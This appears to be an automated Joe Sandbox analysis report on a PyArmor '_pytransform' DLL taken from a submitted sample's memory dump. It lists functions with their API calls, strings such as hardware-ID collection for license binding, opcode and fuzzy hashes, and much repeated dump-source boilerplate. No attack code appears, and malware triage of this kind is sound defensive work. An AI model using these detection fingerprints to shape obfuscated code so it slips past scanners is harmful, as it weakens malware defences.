                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 70A94954
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32 ref: 70A94962
                                                                                                                                                                                                                              • abort.MSVCRT ref: 70A94968
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4278921479-0
                                                                                                                                                                                                                              • Opcode ID: 2a84ff869cffbdd7a109a91c17c52962c74dad46983ad83f24bb0c88d139ea47
                                                                                                                                                                                                                              • Instruction ID: b9eb26f5951e9e0de24da8736d3e1234a6c9b7b70eae2aeae417c23c4d4cf4b2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a84ff869cffbdd7a109a91c17c52962c74dad46983ad83f24bb0c88d139ea47
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F121F071A29F44DAEB00DB61FC8079A33A8BB08B95F54422AD94E53728EF3CE605C744
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A0ECE0 Relevance: 7.7, APIs: 6, Instructions: 177COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: freememcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3223336191-0
                                                                                                                                                                                                                              • Opcode ID: 3e2b61e89ca79fd8abcdd33a428daeb293fc632d2a606cbbf3c5c43fa4f16a70
                                                                                                                                                                                                                              • Instruction ID: 5fb67fcabd9a79949caa384156dcd435677f8e3c1769f29a87783d05099f0815
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e2b61e89ca79fd8abcdd33a428daeb293fc632d2a606cbbf3c5c43fa4f16a70
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A551D3727182488AE711DF25FD0179E73A0F795BC4F584626EE4A83B68EB3CD941DB04
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A0F270 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 361COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: freememcpy
                                                                                                                                                                                                                              • String ID: code$obfmode.c
                                                                                                                                                                                                                              • API String ID: 3223336191-930819804
                                                                                                                                                                                                                              • Opcode ID: fdaa544642e5fda469d03b0f6c78b0b53afe56dc145e5ab7868aa93cfc72fba7
                                                                                                                                                                                                                              • Instruction ID: 6cbc21da111efa7ff5ee044be34d0df4aed96ae463e772371a7608a0d22e1638
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fdaa544642e5fda469d03b0f6c78b0b53afe56dc145e5ab7868aa93cfc72fba7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2EF1B172609B89C6E700CF25F88035E77B5F799B84F648616DA4A57B6CEB3CE941CB00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A2B250 Relevance: 6.3, Strings: 4, Instructions: 1259COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: in != NULL$out != NULL$outlen != NULL$src/misc/base64/base64_decode.c
                                                                                                                                                                                                                              • API String ID: 0-942433653
                                                                                                                                                                                                                              • Opcode ID: c587b8f212c1029259407136e317f7794ae509e1870aa32d5a70234a138349d6
                                                                                                                                                                                                                              • Instruction ID: 68b6930381b209b3226ab7b5ed7df631656896f82650ec4d7b2e9f7b5023728a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c587b8f212c1029259407136e317f7794ae509e1870aa32d5a70234a138349d6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4926A7392C7C887D3078E64A8A439E7A22A3D9357F894234EF071B39AE275DE55C311
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A06A30 Relevance: 4.5, APIs: 3, Instructions: 44memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual$InfoSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2622297391-0
                                                                                                                                                                                                                              • Opcode ID: ec60a794fd5b31d8f3c7d54df2a732e6a3a0239dc2e95a3307306e224be95bf2
                                                                                                                                                                                                                              • Instruction ID: cae8bcc6486e391f2783f21becac3b1756ce9a30731ef45185ac0207629a6ed7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec60a794fd5b31d8f3c7d54df2a732e6a3a0239dc2e95a3307306e224be95bf2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A01A7A1B1640882DE21A722F90936962A26B58BD9F048735EA1F5B79CFE2CD2808604
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A7020C Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 101db2d083cfd69236dc5fc8935f9643c9e87945f5b1bd3ee677a7c27a966408
                                                                                                                                                                                                                              • Instruction ID: 6ad309f9e069b444ac99c670623c4fa5318c9dad01ee73f2b6863d5fffb44bba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 101db2d083cfd69236dc5fc8935f9643c9e87945f5b1bd3ee677a7c27a966408
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF110DB2A29240CFE3909F08E88475B76A0E384755F10A525F79AC77A9D67CC944CF40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A04B50 Relevance: 119.4, APIs: 63, Strings: 5, Instructions: 431stringfileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errno$fprintfstrerror$fclosefputc$fwrite
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$_pytransform.c$inbuf$pytransform.log
                                                                                                                                                                                                                              • API String ID: 3108438096-3708888661
                                                                                                                                                                                                                              • Opcode ID: 583cd1e9220f1dd2f7d3c8f24a3728039e6616098b96332d5db39e69afc5e644
                                                                                                                                                                                                                              • Instruction ID: 559cfa1567364da68d30e0acd8ebf514fdb33cf20bba051f451a3ec5709111b8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 583cd1e9220f1dd2f7d3c8f24a3728039e6616098b96332d5db39e69afc5e644
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4F1ACB0B19716DAEA049B62FD1076D23A1BB89BC5F44422ADD0E1776CEF6CF506C306
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A140A0 Relevance: 94.8, APIs: 47, Strings: 7, Instructions: 338stringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errno$fprintf$fclosefputc$freefseekmallocstrrchr
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$.pye$__file__$__main__$_pytransform.c$pytransform.log
                                                                                                                                                                                                                              • API String ID: 1013380922-457461209
                                                                                                                                                                                                                              • Opcode ID: 9d970745227c504c3da304983f067ca686a49d769afaac85ce26c9ca1024a16d
                                                                                                                                                                                                                              • Instruction ID: d5f15d50dd453c13d34ad8f439295f030a0ca1d48604cb323facecd0a8fcbf97
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d970745227c504c3da304983f067ca686a49d769afaac85ce26c9ca1024a16d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AD1AE70B09716DAEA059B16ED5079C2361BB89BC5F44422ADD0E1B36CEF7CF946C306
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A17F90 Relevance: 84.3, APIs: 44, Strings: 4, Instructions: 322COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.445381588.0000000070A01000.00000020.00000001.01000000.00000012.sdmp, Offset: 70A00000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445361114.0000000070A00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445504354.0000000070A97000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445518410.0000000070A98000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445583963.0000000070AF8000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445653158.0000000070B21000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445667503.0000000070B27000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445683298.0000000070B29000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445692487.0000000070B2A000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445707354.0000000070B2B000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.445717308.0000000070B2E000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_70a00000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _errno$fprintf$fclosefputc$freadfreemalloc
                                                                                                                                                                                                                              • String ID: %s$%s,%d,0x%x,$_pytransform.c$pytransform.log
                                                                                                                                                                                                                              • API String ID: 957815278-2792274189
                                                                                                                                                                                                                              • Opcode ID: 02b00c85f3e8ba5a879f53c0fbaafdac575b8cdb83be14368d1293af3c3d809a
                                                                                                                                                                                                                              • Instruction ID: f9bc42ae6b7023a6dba93ca5b908204623221fefba8715b6440a2e3c2fe7c30a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02b00c85f3e8ba5a879f53c0fbaafdac575b8cdb83be14368d1293af3c3d809a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1C18EA0B19706D9EA019B12FE507AC2366BB89BC5F84422ADE0E1776DDF3CF545C306
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 70A22A60 Relevance: 72.0, APIs: 25, Strings: 16, Instructions: 241filestringCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • fwrite.MSVCRT ref: 70A22A9E
                                                                                                                                                                                                                                • Part of subcall function 70A22720: strlen.MSVCRT ref: 70A22743
                                                                                                                                                                                                                              • fprintf.MSVCRT ref: 70A22AD7
                                                                                                                                                                                                                              • fputc.MSVCRT ref: 70A22B09
                                                                                                                                                                                                                                • Part of subcall function 70A21E00: GetAdaptersAddresses.IPHLPAPI ref: 70A21E31
                                                                                                                                                                                                                                • Part of subcall function 70A21E00: GetProcessHeap.KERNEL32 ref: 70A21EAD
                                                                                                                                                                                                                                • Part of subcall function 70A21E00: HeapFree.KERNEL32 ref: 70A21EB7
                                                                                                                                                                                                                              • fprintf.MSVCRT ref: 70A22B38
                                                                                                                                                                                                                                • Part of subcall function 70A21C20: GetProcessHeap.KERNEL32 ref: 70A21C73
                                                                                                                                                                                                                                • Part of subcall function 70A21C20: HeapFree.KERNEL32 ref: 70A21C7D
                                                                                                                                                                                                                              • fputc.MSVCRT ref: 70A22B62
                                                                                                                                                                                                                                • Part of subcall function 70A21F70: GetAdaptersAddresses.IPHLPAPI ref: 70A21FA4
                                                                                                                                                                                                                                • Part of subcall function 70A21F70: inet_ntoa.WS2_32 ref: 70A21FE5
                                                                                                                                                                                                                                • Part of subcall function 70A21F70: GetProcessHeap.KERNEL32 ref: 70A22000
                                                                                                                                                                                                                                • Part of subcall function 70A21F70: HeapFree.KERNEL32 ref: 70A2200A
                                                                                                                                                                                                                              • fprintf.MSVCRT ref: 70A22B91
                                                                                                                                                                                                                              • fputc.MSVCRT ref: 70A22BA5
                                                                                                                                                                                                                                • Part of subcall function 70A22350: GetProcessHeap.KERNEL32 ref: 70A2236B
                                                                                                                                                                                                                                • Part of subcall function 70A22350: HeapAlloc.KERNEL32 ref: 70A2237F
                                                                                                                                                                                                                                • Part of subcall function 70A22350: GetNetworkParams.IPHLPAPI ref: 70A223B7
                                                                                                                                                                                                                                • Part of subcall function 70A22350: GetProcessHeap.KERNEL32 ref: 70A223D9
                                                                                                                                                                                                                                • Part of subcall function 70A22350: HeapFree.KERNEL32 ref: 70A223E3
                                                                                                                                                                                                                              • fprintf.MSVCRT ref: 70A22BD4
                                                                                                                                                                                                                              • fwrite.MSVCRT ref: 70A22BF5
                                                                                                                                                                                                                              • strchr.MSVCRT ref: 70A22C1B
                                                                                                                                                                                                                              • fputc.MSVCRT ref: 70A22C32
                                                                                                                                                                                                                              • fwrite.MSVCRT ref: 70A22C53
                                                                                                                                                                                                                              • fprintf.MSVCRT ref: 70A22C7B
                                                                                                                                                                                                                              • strchr.MSVCRT ref: 70A22C88
                                                                                                                                                                                                                              • fprintf.MSVCRT ref: 70A22CA9
                                                                                                                                                                                                                              • fputc.MSVCRT ref: 70A22CCC
                                                                                                                                                                                                                              • fwrite.MSVCRT ref: 70A22CED
                                                                                                                                                                                                                              • fprintf.MSVCRT ref: 70A22D2D
                                                                                                                                                                                                                              • fprintf.MSVCRT ref: 70A22D57
                                                                                                                                                                                                                              • fputc.MSVCRT ref: 70A22D78
                                                                                                                                                                                                                              • fwrite.MSVCRT ref: 70A22DC7
                                                                                                                                                                                                                              • fwrite.MSVCRT ref: 70A22DE8
                                                                                                                                                                                                                              • fwrite.MSVCRT ref: 70A22E09
                                                                                                                                                                                                                              • fwrite.MSVCRT ref: 70A22E2A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • >", xrefs: 70A22D87
                                                                                                                                                                                                                              • "%s", xrefs: 70A22C5D, 70A22C9C
                                                                                                                                                                                                                              • Failed to get harddisk information., xrefs: 70A22DB2
                                                                                                                                                                                                                              • Failed to get mac address., xrefs: 70A22DD3
                                                                                                                                                                                                                              • Change logsv6.2.0(r21): Remove trailing dot from harddisk serial numberv6.4.2(r34): Support binding multiple mac addressesv6.5.3(r37): Support binding named harddiskv6.7.5(r45): Support mmc/sd card in Linux, xrefs: 70A22BE0
                                                                                                                                                                                                                              • Domain name: "%s", xrefs: 70A22BC7
                                                                                                                                                                                                                              • Failed to get domain name., xrefs: 70A22E15
                                                                                                                                                                                                                              • Failed to get ip address., xrefs: 70A22DF4
                                                                                                                                                                                                                              • Serial number of default harddisk: "%s", xrefs: 70A22ACA
                                                                                                                                                                                                                              • Ip address: "%s", xrefs: 70A22B84
                                                                                                                                                                                                                              • Hardware informations got by PyArmor:, xrefs: 70A22A86
                                                                                                                                                                                                                              • Multiple Mac addresses: "<, xrefs: 70A22CD8
                                                                                                                                                                                                                              • Default Mac address: "%s", xrefs: 70A22B2B
                                                                                                                                                                                                                              • %02x, xrefs: 70A22D4A
